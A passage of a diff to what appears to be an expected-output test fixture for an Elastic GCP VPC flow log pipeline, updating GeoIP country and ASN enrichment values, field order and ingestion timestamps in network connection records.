"{\"insertId\":\"19im82tfdygzo7\",\"jsonPayload\":{\"bytes_sent\":\"519100\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60110},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"224\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", @@ -21101,11 +22101,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33550, @@ -21183,7 +22188,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392346600Z", + "ingested": "2021-12-14T14:43:27.415283393Z", "original": "{\"insertId\":\"19im82tfdygznb\",\"jsonPayload\":{\"bytes_sent\":\"139513\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143811431Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143811431Z", @@ -21194,43 +22199,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 22, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" - }, - "as": { - "number": 4837 - }, - "address": "67.43.156.14", - "port": 41822, - "bytes": 0, - "ip": "67.43.156.14", - "packets": 8 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 8, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -21241,6 +22209,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -21261,8 +22232,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 22, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 41822, + "bytes": 0, + "ip": "67.43.156.14", + "packets": 8 + }, "event": { - "ingested": "2021-12-09T13:37:46.392352100Z", + "ingested": "2021-12-14T14:43:27.415283920Z", "original": "{\"insertId\":\"19im82tfdygzne\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41822},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:40.058226439Z\",\"packets_sent\":\"8\",\"reporter\":\"DEST\",\"rtt_msec\":\"1439\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", @@ -21270,6 +22266,18 @@ "id": "19im82tfdygzne", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 8, + "direction": "inbound" } }, { @@ -21278,11 +22286,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -21360,7 +22373,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392357700Z", + "ingested": "2021-12-14T14:43:27.415284409Z", "original": "{\"insertId\":\"1gq7q7afe373fw\",\"jsonPayload\":{\"bytes_sent\":\"11109\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"105\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", @@ -21376,11 +22389,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33970, @@ -21458,7 +22476,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392363200Z", + "ingested": "2021-12-14T14:43:27.415284849Z", "original": "{\"insertId\":\"1gq7q7afe373et\",\"jsonPayload\":{\"bytes_sent\":\"173496\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821154389Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", @@ -21480,11 +22498,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -21556,7 +22579,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392368900Z", + "ingested": "2021-12-14T14:43:27.415285242Z", "original": "{\"insertId\":\"1gq7q7afe373f4\",\"jsonPayload\":{\"bytes_sent\":\"182861\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"245\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", @@ -21572,11 +22595,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -21654,7 +22682,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392374300Z", + "ingested": "2021-12-14T14:43:27.415285788Z", "original": "{\"insertId\":\"1gq7q7afe373eo\",\"jsonPayload\":{\"bytes_sent\":\"12145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"94\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", @@ -21665,43 +22693,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65319, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 178669, - "packets": 634, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", - "bytes": 178669, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 634, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -21712,6 +22703,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -21732,8 +22726,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65319, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 178669, + "packets": 634, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392379900Z", + "ingested": "2021-12-14T14:43:27.415286197Z", "original": "{\"insertId\":\"1gq7q7afe373fb\",\"jsonPayload\":{\"bytes_sent\":\"178669\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65319,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"634\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740597880Z", @@ -21741,6 +22760,18 @@ "id": "1gq7q7afe373fb", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", + "bytes": 178669, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 634, + "direction": "outbound" } }, { @@ -21749,11 +22780,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -21831,7 +22867,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392386300Z", + "ingested": "2021-12-14T14:43:27.415286795Z", "original": "{\"insertId\":\"1gq7q7afe373fs\",\"jsonPayload\":{\"bytes_sent\":\"62066\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"359\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -21853,11 +22889,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33970, @@ -21929,7 +22970,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392389600Z", + "ingested": "2021-12-14T14:43:27.415287276Z", "original": "{\"insertId\":\"1gq7q7afe373ei\",\"jsonPayload\":{\"bytes_sent\":\"13440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", @@ -21945,11 +22986,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33966, @@ -22027,7 +23073,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392394100Z", + "ingested": "2021-12-14T14:43:27.415287804Z", "original": "{\"insertId\":\"1gq7q7afe373ez\",\"jsonPayload\":{\"bytes_sent\":\"368131\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.800931420Z\",\"packets_sent\":\"76\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", @@ -22043,11 +23089,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -22125,7 +23176,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392399300Z", + "ingested": "2021-12-14T14:43:27.415288290Z", "original": "{\"insertId\":\"1gq7q7afe373fh\",\"jsonPayload\":{\"bytes_sent\":\"66258\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"365\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", @@ -22136,9 +23187,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.763Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 156 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -22147,13 +23228,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65276, @@ -22161,6 +23245,16 @@ "ip": "67.43.156.13", "packets": 749 }, + "event": { + "ingested": "2021-12-14T14:43:27.415288740Z", + "original": "{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760349279Z", + "end": "2019-06-14T03:49:56.220621567Z", + "id": "1gq7q7afe373es", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22172,7 +23266,9 @@ "iana_number": "6", "packets": 749, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22183,6 +23279,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -22199,25 +23298,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 156 + "ms": 62 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392404100Z", - "original": 